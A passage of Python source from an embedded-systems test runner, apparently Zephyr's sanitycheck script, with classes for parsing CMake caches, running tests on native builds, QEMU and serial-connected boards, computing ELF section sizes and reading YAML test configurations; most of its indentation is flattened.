if val in ('ON', 'YES', 'TRUE', 'Y'):
return 1
elif val in ('OFF', 'NO', 'FALSE', 'N', 'IGNORE', 'NOTFOUND', ''):
return 0
elif val.endswith('-NOTFOUND'):
return 0
else:
try:
v = int(val)
return v != 0
except ValueError as exc:
raise ValueError('invalid bool {}'.format(val)) from exc
@classmethod
def from_line(cls, line, line_no):
# Comments can only occur at the beginning of a line.
# (The value of an entry could contain a comment character).
if line.startswith('//') or line.startswith('#'):
return None
# Whitespace-only lines do not contain cache entries.
if not line.strip():
return None
m = cls.CACHE_ENTRY.match(line)
if not m:
return None
name, type_, value = (m.group(g) for g in ('name', 'type', 'value'))
if type_ == 'BOOL':
try:
value = cls._to_bool(value)
except ValueError as exc:
args = exc.args + ('on line {}: {}'.format(line_no, line),)
raise ValueError(args) from exc
elif type_ in ['STRING', 'INTERNAL']:
# If the value is a CMake list (i.e. is a string which
# contains a ';'), convert to a Python list.
if ';' in value:
value = value.split(';')
return CMakeCacheEntry(name, value)
def __init__(self, name, value):
self.name = name
self.value = value
def __str__(self):
fmt = 'CMakeCacheEntry(name={}, value={})'
return fmt.format(self.name, self.value)
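# Illustrative example, added commentary only (hypothetical cache lines):
#
#   entry = CMakeCacheEntry.from_line('ZEPHYR_TOOLCHAIN_VARIANT:STRING=zephyr', 1)
#   # entry.name == 'ZEPHYR_TOOLCHAIN_VARIANT', entry.value == 'zephyr'
#   multi = CMakeCacheEntry.from_line('FOO:STRING=a;b;c', 2)
#   # multi.value == ['a', 'b', 'c'] because ';' lists become Python lists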
class CMakeCache:
'''Parses and represents a CMake cache file.'''
@staticmethod
def from_file(cache_file):
return CMakeCache(cache_file)
def __init__(self, cache_file):
self.cache_file = cache_file
self.load(cache_file)
def load(self, cache_file):
entries = []
with open(cache_file, 'r') as cache:
for line_no, line in enumerate(cache):
entry = CMakeCacheEntry.from_line(line, line_no)
if entry:
entries.append(entry)
self._entries = OrderedDict((e.name, e) for e in entries)
def get(self, name, default=None):
entry = self._entries.get(name)
if entry is not None:
return entry.value
else:
return default
def get_list(self, name, default=None):
if default is None:
default = []
entry = self._entries.get(name)
if entry is not None:
value = entry.value
if isinstance(value, list):
return value
elif isinstance(value, str):
return [value] if value else []
else:
msg = 'invalid value {} type {}'
raise RuntimeError(msg.format(value, type(value)))
else:
return default
def __contains__(self, name):
return name in self._entries
def __getitem__(self, name):
return self._entries[name].value
def __setitem__(self, name, entry):
if not isinstance(entry, CMakeCacheEntry):
msg = 'improper type {} for value {}, expecting CMakeCacheEntry'
raise TypeError(msg.format(type(entry), entry))
self._entries[name] = entry
def __delitem__(self, name):
del self._entries[name]
def __iter__(self):
return iter(self._entries.values())
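# A minimal usage sketch, assuming a hypothetical build directory and entry
# names; nothing in this module calls it:
def _example_read_cmake_cache(build_dir):
    cache = CMakeCache.from_file(os.path.join(build_dir, 'CMakeCache.txt'))
    board = cache.get('CACHED_BOARD')          # None when the entry is missing
    includes = cache.get_list('INCLUDE_DIRS')  # always a list, possibly empty
    return board, includes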
class SanityCheckException(Exception):
pass
class SanityRuntimeError(SanityCheckException):
pass
class ConfigurationError(SanityCheckException):
def __init__(self, cfile, message):
SanityCheckException.__init__(self, cfile + ": " + message)
class BuildError(SanityCheckException):
pass
class ExecutionError(SanityCheckException):
pass
class HarnessImporter:
def __init__(self, name):
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts/sanity_chk"))
module = __import__("harness")
if name:
my_class = getattr(module, name)
else:
my_class = getattr(module, "Test")
self.instance = my_class()
class Handler:
def __init__(self, instance, type_str="build"):
"""Constructor
"""
self.lock = threading.Lock()
self.state = "waiting"
self.run = False
self.duration = 0
self.type_str = type_str
self.binary = None
self.pid_fn = None
self.call_make_run = False
self.name = instance.name
self.instance = instance
self.timeout = instance.testcase.timeout
self.sourcedir = instance.testcase.source_dir
self.build_dir = instance.build_dir
self.log = os.path.join(self.build_dir, "handler.log")
self.returncode = 0
self.set_state("running", self.duration)
self.generator = None
self.generator_cmd = None
self.args = []
def set_state(self, state, duration):
self.lock.acquire()
self.state = state
self.duration = duration
self.lock.release()
def get_state(self):
self.lock.acquire()
ret = (self.state, self.duration)
self.lock.release()
return ret
def record(self, harness):
if harness.recording:
filename = os.path.join(self.build_dir, "recording.csv")
with open(filename, "at") as csvfile:
cw = csv.writer(csvfile, harness.fieldnames, lineterminator=os.linesep)
cw.writerow(harness.fieldnames)
for instance in harness.recording:
cw.writerow(instance)
class BinaryHandler(Handler):
def __init__(self, instance, type_str):
"""Constructor
@param instance Test Instance
"""
super().__init__(instance, type_str)
self.terminated = False
self.call_west_flash = False
# Tool options
self.valgrind = False
self.lsan = False
self.asan = False
self.ubsan = False
self.coverage = False
def try_kill_process_by_pid(self):
if self.pid_fn:
pid = int(open(self.pid_fn).read())
os.unlink(self.pid_fn)
self.pid_fn = None # clear so we don't try to kill the binary twice
try:
os.kill(pid, signal.SIGTERM)
except ProcessLookupError:
pass
def terminate(self, proc):
        # encapsulate terminate functionality so we do it consistently wherever
        # we might want to terminate the proc. We need try_kill_process_by_pid
        # because of both how newer ninja (1.6.0 or greater) and .NET / renode
        # work. Newer versions of ninja don't seem to pass SIGTERM down to their
        # children, so we need to use try_kill_process_by_pid.
self.try_kill_process_by_pid()
proc.terminate()
# sleep for a while before attempting to kill
time.sleep(0.5)
proc.kill()
self.terminated = True
def _output_reader(self, proc, harness):
log_out_fp = open(self.log, "wt")
for line in iter(proc.stdout.readline, b''):
logger.debug("OUTPUT: {0}".format(line.decode('utf-8').rstrip()))
log_out_fp.write(line.decode('utf-8'))
log_out_fp.flush()
harness.handle(line.decode('utf-8').rstrip())
if harness.state:
try:
# POSIX arch based ztests end on their own,
# so let's give it up to 100ms to do so
proc.wait(0.1)
except subprocess.TimeoutExpired:
self.terminate(proc)
break
log_out_fp.close()
def handle(self):
harness_name = self.instance.testcase.harness.capitalize()
harness_import = HarnessImporter(harness_name)
harness = harness_import.instance
harness.configure(self.instance)
if self.call_make_run:
command = [self.generator_cmd, "run"]
elif self.call_west_flash:
command = ["west", "flash", "--skip-rebuild", "-d", self.build_dir]
else:
command = [self.binary]
run_valgrind = False
if self.valgrind and shutil.which("valgrind"):
command = ["valgrind", "--error-exitcode=2",
"--leak-check=full",
"--suppressions=" + ZEPHYR_BASE + "/scripts/valgrind.supp",
"--log-file=" + self.build_dir + "/valgrind.log"
] + command
run_valgrind = True
logger.debug("Spawning process: " +
" ".join(shlex.quote(word) for word in command) + os.linesep +
"in directory: " + self.build_dir)
start_time = time.time()
env = os.environ.copy()
if self.asan:
env["ASAN_OPTIONS"] = "log_path=stdout:" + \
env.get("ASAN_OPTIONS", "")
if not self.lsan:
env["ASAN_OPTIONS"] += "detect_leaks=0"
if self.ubsan:
env["UBSAN_OPTIONS"] = "log_path=stdout:halt_on_error=1:" + \
env.get("UBSAN_OPTIONS", "")
with subprocess.Popen(command, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, cwd=self.build_dir, env=env) as proc:
logger.debug("Spawning BinaryHandler Thread for %s" % self.name)
t = threading.Thread(target=self._output_reader, args=(proc, harness,), daemon=True)
t.start()
t.join(self.timeout)
if t.is_alive():
self.terminate(proc)
t.join()
proc.wait()
self.returncode = proc.returncode
handler_time = time.time() - start_time
if self.coverage:
subprocess.call(["GCOV_PREFIX=" + self.build_dir,
"gcov", self.sourcedir, "-b", "-s", self.build_dir], shell=True)
self.try_kill_process_by_pid()
# FIXME: This is needed when killing the simulator, the console is
# garbled and needs to be reset. Did not find a better way to do that.
subprocess.call(["stty", "sane"])
self.instance.results = harness.tests
if not self.terminated and self.returncode != 0:
# When a process is killed, the default handler returns 128 + SIGTERM
# so in that case the return code itself is not meaningful
self.set_state("failed", handler_time)
self.instance.reason = "Failed"
elif run_valgrind and self.returncode == 2:
self.set_state("failed", handler_time)
self.instance.reason = "Valgrind error"
elif harness.state:
self.set_state(harness.state, handler_time)
if harness.state == "failed":
self.instance.reason = "Failed"
else:
self.set_state("timeout", handler_time)
self.instance.reason = "Timeout"
self.record(harness)
class DeviceHandler(Handler):
def __init__(self, instance, type_str):
"""Constructor
@param instance Test Instance
"""
super().__init__(instance, type_str)
self.suite = None
def monitor_serial(self, ser, halt_fileno, harness):
log_out_fp = open(self.log, "wt")
ser_fileno = ser.fileno()
readlist = [halt_fileno, ser_fileno]
while ser.isOpen():
readable, _, _ = select.select(readlist, [], [], self.timeout)
if halt_fileno in readable:
logger.debug('halted')
ser.close()
break
if ser_fileno not in readable:
continue # Timeout.
serial_line = None
try:
serial_line = ser.readline()
except TypeError:
pass
except serial.SerialException:
ser.close()
break
# Just because ser_fileno has data doesn't mean an entire line
# is available yet.
if serial_line:
sl = serial_line.decode('utf-8', 'ignore').lstrip()
logger.debug("DEVICE: {0}".format(sl.rstrip()))
log_out_fp.write(sl)
log_out_fp.flush()
harness.handle(sl.rstrip())
if harness.state:
ser.close()
break
log_out_fp.close()
def device_is_available(self, instance):
device = instance.platform.name
fixture = instance.testcase.harness_config.get("fixture")
for i in self.suite.connected_hardware:
if fixture and fixture not in i.get('fixtures', []):
continue
if i['platform'] == device and i['available'] and (i['serial'] or i.get('serial_pty', None)):
return True
return False
def get_available_device(self, instance):
device = instance.platform.name
for i in self.suite.connected_hardware:
if i['platform'] == device and i['available'] and (i['serial'] or i.get('serial_pty', None)):
i['available'] = False
i['counter'] += 1
return i
return None
def make_device_available(self, serial):
with hw_map_local:
for i in self.suite.connected_hardware:
if i['serial'] == serial or i.get('serial_pty', None):
i['available'] = True
@staticmethod
def run_custom_script(script, timeout):
with subprocess.Popen(script, stderr=subprocess.PIPE, stdout=subprocess.PIPE) as proc:
try:
stdout, _ = proc.communicate(timeout=timeout)
logger.debug(stdout.decode())
except subprocess.TimeoutExpired:
proc.kill()
proc.communicate()
logger.error("{} timed out".format(script))
def handle(self):
out_state = "failed"
while not self.device_is_available(self.instance):
logger.debug("Waiting for device {} to become available".format(self.instance.platform.name))
time.sleep(1)
hardware = self.get_available_device(self.instance)
if hardware:
runner = hardware.get('runner', None) or self.suite.west_runner
serial_pty = hardware.get('serial_pty', None)
if serial_pty:
master, slave = pty.openpty()
try:
ser_pty_process = subprocess.Popen(re.split(',| ', serial_pty), stdout=master, stdin=master, stderr=master)
except subprocess.CalledProcessError as error:
logger.error("Failed to run subprocess {}, error {}".format(serial_pty, error.output))
return
serial_device = os.ttyname(slave)
else:
serial_device = hardware['serial']
logger.debug("Using serial device {}".format(serial_device))
if (self.suite.west_flash is not None) or runner:
command = ["west", "flash", "--skip-rebuild", "-d", self.build_dir]
command_extra_args = []
# There are three ways this option is used.
# 1) bare: --west-flash
# This results in options.west_flash == []
# 2) with a value: --west-flash="--board-id=42"
# This results in options.west_flash == "--board-id=42"
# 3) Multiple values: --west-flash="--board-id=42,--erase"
# This results in options.west_flash == "--board-id=42 --erase"
if self.suite.west_flash and self.suite.west_flash != []:
command_extra_args.extend(self.suite.west_flash.split(','))
if runner:
command.append("--runner")
command.append(runner)
board_id = hardware.get("probe_id", hardware.get("id", None))
product = hardware.get("product", None)
if board_id is not None:
if runner == "pyocd":
command_extra_args.append("--board-id")
command_extra_args.append(board_id)
elif runner == "nrfjprog":
command_extra_args.append("--snr")
command_extra_args.append(board_id)
elif runner == "openocd" and product == "STM32 STLink":
command_extra_args.append("--cmd-pre-init")
command_extra_args.append("hla_serial %s" % (board_id))
elif runner == "openocd" and product == "STLINK-V3":
command_extra_args.append("--cmd-pre-init")
command_extra_args.append("hla_serial %s" % (board_id))
elif runner == "openocd" and product == "EDBG CMSIS-DAP":
command_extra_args.append("--cmd-pre-init")
command_extra_args.append("cmsis_dap_serial %s" % (board_id))
elif runner == "jlink":
command.append("--tool-opt=-SelectEmuBySN %s" % (board_id))
if command_extra_args != []:
command.append('--')
command.extend(command_extra_args)
else:
command = [self.generator_cmd, "-C", self.build_dir, "flash"]
pre_script = hardware.get('pre_script')
post_flash_script = hardware.get('post_flash_script')
post_script = hardware.get('post_script')
if pre_script:
self.run_custom_script(pre_script, 30)
try:
ser = serial.Serial(
serial_device,
baudrate=115200,
parity=serial.PARITY_NONE,
stopbits=serial.STOPBITS_ONE,
bytesize=serial.EIGHTBITS,
timeout=self.timeout
)
except serial.SerialException as e:
self.set_state("failed", 0)
self.instance.reason = "Failed"
logger.error("Serial device error: %s" % (str(e)))
if serial_pty:
ser_pty_process.terminate()
outs, errs = ser_pty_process.communicate()
logger.debug("Process {} terminated outs: {} errs {}".format(serial_pty, outs, errs))
self.make_device_available(serial_device)
return
ser.flush()
harness_name = self.instance.testcase.harness.capitalize()
harness_import = HarnessImporter(harness_name)
harness = harness_import.instance
harness.configure(self.instance)
read_pipe, write_pipe = os.pipe()
start_time = time.time()
t = threading.Thread(target=self.monitor_serial, daemon=True,
args=(ser, read_pipe, harness))
t.start()
d_log = "{}/device.log".format(self.instance.build_dir)
logger.debug('Flash command: %s', command)
try:
stdout = stderr = None
with subprocess.Popen(command, stderr=subprocess.PIPE, stdout=subprocess.PIPE) as proc:
try:
(stdout, stderr) = proc.communicate(timeout=30)
logger.debug(stdout.decode())
if proc.returncode != 0:
self.instance.reason = "Device issue (Flash?)"
with open(d_log, "w") as dlog_fp:
dlog_fp.write(stderr.decode())
except subprocess.TimeoutExpired:
proc.kill()
(stdout, stderr) = proc.communicate()
self.instance.reason = "Device issue (Timeout)"
with open(d_log, "w") as dlog_fp:
dlog_fp.write(stderr.decode())
except subprocess.CalledProcessError:
os.write(write_pipe, b'x') # halt the thread
if post_flash_script:
self.run_custom_script(post_flash_script, 30)
t.join(self.timeout)
if t.is_alive():
logger.debug("Timed out while monitoring serial output on {}".format(self.instance.platform.name))
out_state = "timeout"
if ser.isOpen():
ser.close()
if serial_pty:
ser_pty_process.terminate()
outs, errs = ser_pty_process.communicate()
logger.debug("Process {} terminated outs: {} errs {}".format(serial_pty, outs, errs))
os.close(write_pipe)
os.close(read_pipe)
handler_time = time.time() - start_time
if out_state == "timeout":
for c in self.instance.testcase.cases:
if c not in harness.tests:
harness.tests[c] = "BLOCK"
self.instance.reason = "Timeout"
self.instance.results = harness.tests
if harness.state:
self.set_state(harness.state, handler_time)
if harness.state == "failed":
self.instance.reason = "Failed"
else:
self.set_state(out_state, handler_time)
if post_script:
self.run_custom_script(post_script, 30)
self.make_device_available(serial_device)
self.record(harness)
class QEMUHandler(Handler):
"""Spawns a thread to monitor QEMU output from pipes
We pass QEMU_PIPE to 'make run' and monitor the pipes for output.
We need to do this as once qemu starts, it runs forever until killed.
Test cases emit special messages to the console as they run, we check
for these to collect whether the test passed or failed.
"""
def __init__(self, instance, type_str):
"""Constructor
@param instance Test instance
"""
super().__init__(instance, type_str)
self.fifo_fn = os.path.join(instance.build_dir, "qemu-fifo")
self.pid_fn = os.path.join(instance.build_dir, "qemu.pid")
if "ignore_qemu_crash" in instance.testcase.tags:
self.ignore_qemu_crash = True
self.ignore_unexpected_eof = True
else:
self.ignore_qemu_crash = False
self.ignore_unexpected_eof = False
@staticmethod
def _get_cpu_time(pid):
"""get process CPU time.
The guest virtual time in QEMU icount mode isn't host time and
it's maintained by counting guest instructions, so we use QEMU
        process execution time to approximate the time of the guest OS.
"""
proc = psutil.Process(pid)
cpu_time = proc.cpu_times()
return cpu_time.user + cpu_time.system
@staticmethod
def _thread(handler, timeout, outdir, logfile, fifo_fn, pid_fn, results, harness,
ignore_unexpected_eof=False):
fifo_in = fifo_fn + ".in"
fifo_out = fifo_fn + ".out"
# These in/out nodes are named from QEMU's perspective, not ours
if os.path.exists(fifo_in):
os.unlink(fifo_in)
os.mkfifo(fifo_in)
if os.path.exists(fifo_out):
os.unlink(fifo_out)
os.mkfifo(fifo_out)
# We don't do anything with out_fp but we need to open it for
# writing so that QEMU doesn't block, due to the way pipes work
out_fp = open(fifo_in, "wb")
# Disable internal buffering, we don't
# want read() or poll() to ever block if there is data in there
in_fp = open(fifo_out, "rb", buffering=0)
log_out_fp = open(logfile, "wt")
start_time = time.time()
timeout_time = start_time + timeout
p = select.poll()
p.register(in_fp, select.POLLIN)
out_state = None
line = ""
timeout_extended = False
pid = 0
if os.path.exists(pid_fn):
pid = int(open(pid_fn).read())
while True:
this_timeout = int((timeout_time - time.time()) * 1000)
if this_timeout < 0 or not p.poll(this_timeout):
try:
if pid and this_timeout > 0:
                        # There's a possibility we polled nothing because the
                        # host did not schedule enough CPU time to the QEMU
                        # process during p.poll(this_timeout).
cpu_time = QEMUHandler._get_cpu_time(pid)
if cpu_time < timeout and not out_state:
timeout_time = time.time() + (timeout - cpu_time)
continue
except ProcessLookupError:
out_state = "failed"
break
if not out_state:
out_state = "timeout"
break
if pid == 0 and os.path.exists(pid_fn):
pid = int(open(pid_fn).read())
try:
c = in_fp.read(1).decode("utf-8")
except UnicodeDecodeError:
# Test is writing something weird, fail
out_state = "unexpected byte"
break
if c == "":
# EOF, this shouldn't happen unless QEMU crashes
if not ignore_unexpected_eof:
out_state = "unexpected eof"
break
line = line + c
if c != "\n":
continue
# line contains a full line of data output from QEMU
log_out_fp.write(line)
log_out_fp.flush()
line = line.strip()
logger.debug("QEMU: %s" % line)
harness.handle(line)
if harness.state:
# if we have registered a fail make sure the state is not
# overridden by a false success message coming from the
# testsuite
if out_state not in ['failed', 'unexpected eof', 'unexpected byte']:
out_state = harness.state
# if we get some state, that means test is doing well, we reset
# the timeout and wait for 2 more seconds to catch anything
# printed late. We wait much longer if code
# coverage is enabled since dumping this information can
# take some time.
if not timeout_extended or harness.capture_coverage:
timeout_extended = True
if harness.capture_coverage:
timeout_time = time.time() + 30
else:
timeout_time = time.time() + 2
line = ""
handler.record(harness)
handler_time = time.time() - start_time
logger.debug("QEMU complete (%s) after %f seconds" %
(out_state, handler_time))
if out_state == "timeout":
handler.instance.reason = "Timeout"
handler.set_state("failed", handler_time)
elif out_state == "failed":
handler.instance.reason = "Failed"
handler.set_state("failed", handler_time)
elif out_state in ['unexpected eof', 'unexpected byte']:
handler.instance.reason = out_state
handler.set_state("failed", handler_time)
else:
handler.set_state(out_state, handler_time)
log_out_fp.close()
out_fp.close()
in_fp.close()
if pid:
try:
if pid:
os.kill(pid, signal.SIGTERM)
except ProcessLookupError:
# Oh well, as long as it's dead! User probably sent Ctrl-C
pass
os.unlink(fifo_in)
os.unlink(fifo_out)
def handle(self):
self.results = {}
self.run = True
# We pass this to QEMU which looks for fifos with .in and .out
# suffixes.
self.fifo_fn = os.path.join(self.instance.build_dir, "qemu-fifo")
self.pid_fn = os.path.join(self.instance.build_dir, "qemu.pid")
if os.path.exists(self.pid_fn):
os.unlink(self.pid_fn)
self.log_fn = self.log
harness_import = HarnessImporter(self.instance.testcase.harness.capitalize())
harness = harness_import.instance
harness.configure(self.instance)
self.thread = threading.Thread(name=self.name, target=QEMUHandler._thread,
args=(self, self.timeout, self.build_dir,
self.log_fn, self.fifo_fn,
self.pid_fn, self.results, harness,
self.ignore_unexpected_eof))
self.instance.results = harness.tests
self.thread.daemon = True
logger.debug("Spawning QEMUHandler Thread for %s" % self.name)
self.thread.start()
subprocess.call(["stty", "sane"])
logger.debug("Running %s (%s)" % (self.name, self.type_str))
command = [self.generator_cmd]
command += ["-C", self.build_dir, "run"]
is_timeout = False
with subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=self.build_dir) as proc:
logger.debug("Spawning QEMUHandler Thread for %s" % self.name)
try:
proc.wait(self.timeout)
except subprocess.TimeoutExpired:
# sometimes QEMU can't handle SIGTERM signal correctly
# in that case kill -9 QEMU process directly and leave
# sanitycheck to judge testing result by console output
is_timeout = True
if os.path.exists(self.pid_fn):
qemu_pid = int(open(self.pid_fn).read())
try:
os.kill(qemu_pid, signal.SIGKILL)
except ProcessLookupError:
pass
proc.wait()
if harness.state == "passed":
self.returncode = 0
else:
self.returncode = proc.returncode
else:
proc.terminate()
proc.kill()
self.returncode = proc.returncode
else:
logger.debug(f"No timeout, return code from qemu: {proc.returncode}")
self.returncode = proc.returncode
# Need to wait for harness to finish processing
# output from QEMU. Otherwise it might miss some
# error messages.
self.thread.join()
if os.path.exists(self.pid_fn):
os.unlink(self.pid_fn)
logger.debug(f"return code from qemu: {self.returncode}")
if (self.returncode != 0 and not self.ignore_qemu_crash) or not harness.state:
self.set_state("failed", 0)
if is_timeout:
self.instance.reason = "Timeout"
else:
self.instance.reason = "Exited with {}".format(self.returncode)
def get_fifo(self):
return self.fifo_fn
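# Added commentary, not in the original file: QEMUHandler._thread() above creates
# two named pipes, <fifo>.in and <fifo>.out, named from QEMU's point of view. The
# ".in" end is kept open for writing only so QEMU never blocks on its side of the
# pipe, and the ".out" end is polled with select.poll(), with the timeout extended
# whenever the harness reports progress (longer when coverage capture is enabled).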
class SizeCalculator:
alloc_sections = [
"bss",
"noinit",
"app_bss",
"app_noinit",
"ccm_bss",
"ccm_noinit"
]
rw_sections = [
"datas",
"initlevel",
"exceptions",
"initshell",
"_static_thread_data_area",
"k_timer_area",
"k_mem_slab_area",
"k_mem_pool_area",
"sw_isr_table",
"k_sem_area",
"k_mutex_area",
"app_shmem_regions",
"_k_fifo_area",
"_k_lifo_area",
"k_stack_area",
"k_msgq_area",
"k_mbox_area",
"k_pipe_area",
"net_if_area",
"net_if_dev_area",
"net_l2_area",
"net_l2_data",
"k_queue_area",
"_net_buf_pool_area",
"app_datas",
"kobject_data",
"mmu_tables",
"app_pad",
"priv_stacks",
"ccm_data",
"usb_descriptor",
"usb_data", "usb_bos_desc",
"uart_mux",
'log_backends_sections',
'log_dynamic_sections',
'log_const_sections',
"app_smem",
'shell_root_cmds_sections',
'log_const_sections',
"font_entry_sections",
"priv_stacks_noinit",
"_GCOV_BSS_SECTION_NAME",
"gcov",
"nocache",
"devices",
"k_heap_area",
]
# These get copied into RAM only on non-XIP
ro_sections = [
"rom_start",
"text",
"ctors",
"init_array",
"reset",
"z_object_assignment_area",
"rodata",
"net_l2",
"vector",
"sw_isr_table",
"settings_handler_static_area",
"bt_l2cap_fixed_chan_area",
"bt_l2cap_br_fixed_chan_area",
"bt_gatt_service_static_area",
"vectors",
"net_socket_register_area",
"net_ppp_proto",
"shell_area",
"tracing_backend_area",
"ppp_protocol_handler_area",
]
def __init__(self, filename, extra_sections):
"""Constructor
@param filename Path to the output binary
The <filename> is parsed by objdump to determine section sizes
"""
# Make sure this is an ELF binary
with open(filename, "rb") as f:
magic = f.read(4)
try:
if magic != b'\x7fELF':
raise SanityRuntimeError("%s is not an ELF binary" % filename)
except Exception as e:
print(str(e))
sys.exit(2)
# Search for CONFIG_XIP in the ELF's list of symbols using NM and AWK.
# GREP can not be used as it returns an error if the symbol is not
# found.
is_xip_command = "nm " + filename + \
" | awk '/CONFIG_XIP/ { print $3 }'"
is_xip_output = subprocess.check_output(
is_xip_command, shell=True, stderr=subprocess.STDOUT).decode(
"utf-8").strip()
try:
if is_xip_output.endswith("no symbols"):
raise SanityRuntimeError("%s has no symbol information" % filename)
except Exception as e:
print(str(e))
sys.exit(2)
self.is_xip = (len(is_xip_output) != 0)
self.filename = filename
self.sections = []
self.rom_size = 0
self.ram_size = 0
self.extra_sections = extra_sections
self._calculate_sizes()
def get_ram_size(self):
"""Get the amount of RAM the application will use up on the device
@return amount of RAM, in bytes
"""
return self.ram_size
def get_rom_size(self):
"""Get the size of the data that this application uses on device's flash
@return amount of ROM, in bytes
"""
return self.rom_size
def unrecognized_sections(self):
"""Get a list of sections inside the binary that weren't recognized
@return list of unrecognized section names
"""
slist = []
for v in self.sections:
if not v["recognized"]:
slist.append(v["name"])
return slist
def _calculate_sizes(self):
""" Calculate RAM and ROM usage by section """
objdump_command = "objdump -h " + self.filename
objdump_output = subprocess.check_output(
objdump_command, shell=True).decode("utf-8").splitlines()
for line in objdump_output:
words = line.split()
if not words: # Skip lines that are too short
continue
index = words[0]
if not index[0].isdigit(): # Skip lines that do not start
continue # with a digit
name = words[1] # Skip lines with section names
if name[0] == '.': # starting with '.'
continue
# TODO this doesn't actually reflect the size in flash or RAM as
# it doesn't include linker-imposed padding between sections.
# It is close though.
size = int(words[2], 16)
if size == 0:
continue
load_addr = int(words[4], 16)
virt_addr = int(words[3], 16)
# Add section to memory use totals (for both non-XIP and XIP scenarios)
# Unrecognized section names are not included in the calculations.
recognized = True
if name in SizeCalculator.alloc_sections:
self.ram_size += size
stype = "alloc"
elif name in SizeCalculator.rw_sections:
self.ram_size += size
self.rom_size += size
stype = "rw"
elif name in SizeCalculator.ro_sections:
self.rom_size += size
if not self.is_xip:
self.ram_size += size
stype = "ro"
else:
stype = "unknown"
if name not in self.extra_sections:
recognized = False
self.sections.append({"name": name, "load_addr": load_addr,
"size": size, "virt_addr": virt_addr,
"type": stype, "recognized": recognized})
class SanityConfigParser:
"""Class to read test case files with semantic checking
"""
def __init__(self, filename, schema):
"""Instantiate a new SanityConfigParser object
@param filename Source .yaml file to read
"""
self.data = {}
self.schema = schema
self.filename = filename
self.tests = {}
self.common = {}
def load(self):
self.data = scl.yaml_load_verify(self.filename, self.schema)
if 'tests' in self.data:
self.tests = self.data['tests']
if 'common' in self.data:
self.common = self.data['common']
def _cast_value(self, value, typestr):
if isinstance(value, str):
v = value.strip()
if typestr == "str":
return v
elif typestr == "float":
return float(value)
elif typestr == "int":
return int(value)
elif typestr == "bool":
return value
elif typestr.startswith("list") and isinstance(value, list):
return value
elif typestr.startswith("list") and isinstance(value, str):
vs = v.split()
if len(typestr) > 4 and typestr[4] == ":":
return [self._cast_value(vsi, typestr[5:]) for vsi in vs]
else:
return vs
elif typestr.startswith("set"):
vs = v.split()
if len(typestr) > 3 and typestr[3] == ":":
return {self._cast_value(vsi, typestr[4:]) for vsi in vs}
else:
return set(vs)
elif typestr.startswith("map"):
return value
else:
raise ConfigurationError(
self.filename, "unknown type '%s'" % value)
def get_test(self, name, valid_keys):
"""Get a dictionary representing the keys/values within a test
@param name The test in the .yaml file to retrieve data from
@param valid_keys A dictionary representing the intended semantics
for this test. Each key in this dictionary is a key that could
be specified, if a key is given in the .yaml file which isn't in
here, it will generate an error. Each value in this dictionary
is another dictionary containing metadata:
"default" - Default value if not given
"type" - Data type to convert the text value to. Simple types
supported are "str", "float", "int", "bool" which will get
converted to respective Python data types. "set" and "list"
may also be specified which will split the value by
whitespace (but keep the elements as strings). finally,
"list:<type>" and "set:<type>" may be given which will
perform a type conversion after splitting the value up.
"required" - If true, raise an error if not defined. If false
and "default" isn't specified, a type conversion will be
done on an empty string
@return A dictionary containing the test key-value pairs with
type conversion and default values filled in per valid_keys
"""
d = {}
for k, v in self.common.items():
d[k] = v
for k, v in self.tests[name].items():
if k in d:
if isinstance(d[k], str):
# By default, we just concatenate string values of keys
# which appear both in "common" and per-test sections,
# but some keys are handled in adhoc way based on their
# semantics.
if k == "filter":
d[k] = "(%s) and (%s)" % (d[k], v)
else:
d[k] += " " + v
else:
d[k] = v
for k, kinfo in valid_keys.items():
if k not in d:
if "required" in kinfo:
required = kinfo["required"]
else:
required = False
if required:
raise ConfigurationError(
self.filename,
"missing required value for '%s' in test '%s'" %
(k, name))
else:
if "default" in kinfo:
default = kinfo["default"]
else:
default = self._cast_value("", kinfo["type"])
d[k] = default
else:
try:
d[k] = self._cast_value(d[k], kinfo["type"])
except ValueError:
raise ConfigurationError(
self.filename, "bad %s value '%s' for key '%s' in name '%s'" %
(kinfo["type"], d[k], k, name))
return d
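# Illustrative sketch of the valid_keys contract documented in get_test() above;
# the key names below are hypothetical and shown only as an example:
#
#   valid_keys = {
#       "timeout":    {"type": "int", "default": 60},
#       "tags":       {"type": "set"},
#       "filter":     {"type": "str", "required": False},
#       "extra_args": {"type": "list"},
#   }
#   parser = SanityConfigParser("testcase.yaml", schema)
#   parser.load()
#   test = parser.get_test("test", valid_keys)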
class Platform:
"""Class representing metadata for a particular platform
Maps directly to BOARD when building"""
platform_schema = scl.yaml_load(os.path.join(ZEPHYR_BASE,
"scripts", "sanity_chk", "platform-schema.yaml"))
def __init__(self):
"""Constructor.
"""
self.name = ""
self.sanitycheck = True
# if no RAM size is specified by the board, take a default of 128K
self.ram = 128
self.ignore_tags = []
self.only_tags = []
self.default = False
# if no flash size is specified by the board, take a default of 512K
self.flash = 512
self.supported = set()
self.arch = ""
self.type = "na"
self.simulation = "na"
self.supported_toolchains = []
self.env = []
self.env_satisfied = True
self.filter_data = dict()
def load(self, platform_file):
scp = SanityConfigParser(platform_file, self.platform_schema)
scp.load()
data = scp.data
self.name = data['identifier']
self.sanitycheck = data.get("sanitycheck", True)
# if no RAM size is specified by the board, take a default of 128K
self.ram = data.get("ram", 128)
testing = data.get("testing", {})
self.ignore_tags = testing.get("ignore_tags", [])
self.only_tags = testing.get("only_tags", [])
self.default = testing.get("default", False)
# if no flash size is specified by the board, take a default of 512K
self.flash = data.get("flash", 512)
self.supported = set()
for supp_feature in data.get("supported", []):
for item in supp_feature.split(":"):
self.supported.add(item)
self.arch = data['arch']
self.type = data.get('type', "na")
self.simulation = data.get('simulation', "na")
self.supported_toolchains = data.get("toolchain", [])
self.env = data.get("env", [])
self.env_satisfied = True
for env in self.env:
if not os.environ.get(env, None):
self.env_satisfied = False
def __repr__(self):
return "<%s on %s>" % (self.name, self.arch)
class DisablePyTestCollectionMixin(object):
__test__ = False
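# Added note: __test__ = False above tells pytest not to collect classes derived
# from this mixin, even though names such as TestCase and TestInstance match
# pytest's default Test* collection pattern.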
class TestCase(DisablePyTestCollectionMixin):
"""Class representing a test application
"""
def __init__(self, testcase_root, workdir, name):
"""TestCase constructor.
This gets called by TestSuite as it finds and reads test yaml files.
Multiple TestCase instances may be generated from a single testcase.yaml,
each one corresponds to an entry within that file.
We need to have a unique name for every single test case. Since
a testcase.yaml can define multiple tests, the canonical name for
the test case is <workdir>/<name>.
